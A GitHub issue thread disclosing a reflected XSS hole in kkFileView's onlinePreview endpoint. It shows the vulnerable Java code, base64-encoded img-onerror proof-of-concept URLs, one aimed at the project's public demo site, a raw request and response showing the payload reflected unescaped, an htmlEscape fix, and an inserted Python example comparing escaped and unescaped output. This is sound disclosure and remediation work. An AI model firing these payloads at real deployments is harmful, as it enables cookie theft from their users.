kekingcn / kkFileView

Universal File Online Preview Project based on Spring-Boot
https://kkview.cn
10.73k stars 2.73k forks

Another kkFileView XSS Vulnerability #389

Open absolutyy opened 2 years ago

absolutyy commented 2 years ago

Description: kkFileView v4.1.0 has another XSS vulnerability, which may lead to the leakage of website cookies.

Vulnerable code location: line 61 of kkFileView/server/src/main/java/cn/keking/web/controller/OnlinePreviewController.java. The errorMsg parameter is user-controllable; after being passed to the error-prompt handling function it is used for the front-end error prompt, and errorMsg is not filtered anywhere in this flow.

    public String onlinePreview(String url, Model model, HttpServletRequest req) {
        String fileUrl;
        try {
            fileUrl = WebUtils.decodeBase64String(url);
        } catch (Exception ex) {
            String errorMsg = String.format(BASE64_DECODE_ERROR_MSG, "url");
            return otherFilePreview.notSupportedFile(model, errorMsg);
        }
        FileAttribute fileAttribute = fileHandlerService.getFileAttribute(fileUrl, req);
        model.addAttribute("file", fileAttribute);
        FilePreview filePreview = previewFactory.get(fileAttribute);
        logger.info("预览文件url:{},previewType:{}", fileUrl, fileAttribute.getType());
        return filePreview.filePreviewHandle(fileUrl, model, fileAttribute);
    }

PoC: The official demo site runs the latest version, 4.1.0, and is used for this demonstration. Visit the vulnerable location (the url parameter value must be base64-encoded and then URL-encoded): https://file.keking.cn/onlinePreview?url=aHR0cHM6Ly93d3cuYmFpZHUuPGltZyBzcmM9MSBvbmVycm9yPWFsZXJ0KDEpPg==

gaoxingzaq commented 2 years ago

Modify \server\src\main\java\cn\keking\service\impl\OtherFilePreviewImpl:

    public String notSupportedFile(Model model, String fileType, String errMsg) {
        fileType = HtmlUtils.htmlEscape(fileType);
        errMsg = HtmlUtils.htmlEscape(errMsg);
        model.addAttribute("fileType", fileType);
        model.addAttribute("msg", errMsg);
        return NOT_SUPPORTED_FILE_PAGE;
    }
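As an added example (not code from this issue's participants or from the kkFileView project), the Python below reproduces the encoding step of the two PoC `url` values posted in this thread and shows the effect of the proposed escaping fix. `render_error_unescaped` and `render_error_escaped` are stand-ins for how the error page's `msg` attribute ends up in the HTML; Python's `html.escape` stands in for Spring's `HtmlUtils.htmlEscape`. The PoC strings are the ones from the thread; everything else is assumed for illustration.

```python
"""Added example (not kkFileView's own code).

Reproduces the reporter's payload encoding and contrasts an unescaped error
message sink with an escaped one (modelled on the htmlEscape fix above).
"""
import base64
import html
from urllib.parse import quote, unquote

# The two `url` parameter values copied from this issue thread.
POC_V410 = "aHR0cHM6Ly93d3cuYmFpZHUuPGltZyBzcmM9MSBvbmVycm9yPWFsZXJ0KDEpPg=="
POC_V430 = ("aHR0cHM6Ly93d3cuZ29vZ2xlLjxpbWcgc3JjPTEgb25lcnJvcj1hbGVydChkb2N1"
            "bWVudC5kb21haW4pPj1DQw==")


def decode_url_param(param: str) -> str:
    """Reverse the reporter's steps: URL-decode, then base64-decode."""
    return base64.b64decode(unquote(param)).decode("utf-8")


def encode_url_param(file_url: str) -> str:
    """Build a `url` query value as the reporter describes: base64, then URL-encode."""
    b64 = base64.b64encode(file_url.encode("utf-8")).decode("ascii")
    return quote(b64, safe="")


def render_error_unescaped(msg: str) -> str:
    """Vulnerable sink (assumed model): the message is interpolated as raw HTML."""
    return f'<span style="color: red; display: inline;">{msg}</span>'


def render_error_escaped(msg: str) -> str:
    """Fixed sink (assumed model): escape before interpolation, as htmlEscape does."""
    return f'<span style="color: red; display: inline;">{html.escape(msg, quote=True)}</span>'


def contains_injected_tag(fragment: str) -> bool:
    """Did an <img ... onerror=...> tag survive into the rendered HTML?"""
    return "<img" in fragment and "onerror=" in fragment


if __name__ == "__main__":
    for poc in (POC_V410, POC_V430):
        file_url = decode_url_param(poc)
        print("decoded url param :", file_url)
        print("re-encoded        :", encode_url_param(file_url))
        print("unescaped render  :", render_error_unescaped(file_url))
        print("escaped render    :", render_error_escaped(file_url))
```

Note that escaping converts `<` and `>` to `&lt;` and `&gt;`, so the browser renders the payload as text; the `onerror=` substring is still visible in the page but is no longer an attribute of a live element.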

edyang commented 5 months ago

Still present in version 4.3.0!

#################### Request

GET /onlinePreview?url=aHR0cHM6Ly93d3cuZ29vZ2xlLjxpbWcgc3JjPTEgb25lcnJvcj1hbGVydChkb2N1bWVudC5kb21haW4pPj1DQw== HTTP/1.1
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
Host: 10.63.130.39:30033

#################### Response

HTTP/1.1 200 OK
Date: Mon, 27 May 2024 08:26:02 GMT
Content-Length: 1058

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8" />
    <style type="text/css">
        body {
            margin: 0 auto;
            width: 900px;
            background-color: #CCB;
        }

        .container {
            width: 700px;
            height: 700px;
            margin: 0 auto;
        }

        img {
            width: auto;
            height: auto;
            max-width: 100%;
            max-height: 100%;
            padding-bottom: 36px;
        }

        p {
            display: block;
            font-size: 20px;
            color: blue;
        }
    </style>
</head>
<body>
<div class="container">
    <img src="images/sorry.jpg" />
    <p>
        Preview source file comes from an untrusted site: <span style="color: red; display: inline;">www.google.<img src=1 onerror=alert(document.domain)>=cc</span> Please contact the administrator!<br>
        For any questions, join the kk open source community on Zhishi Xingqiu (知识星球) to ask: <a href="https://t.zsxq.com/09ZHSXbsQ">https://t.zsxq.com/09ZHSXbsQ</a><br>
    </p>
</div>
</body>
</html>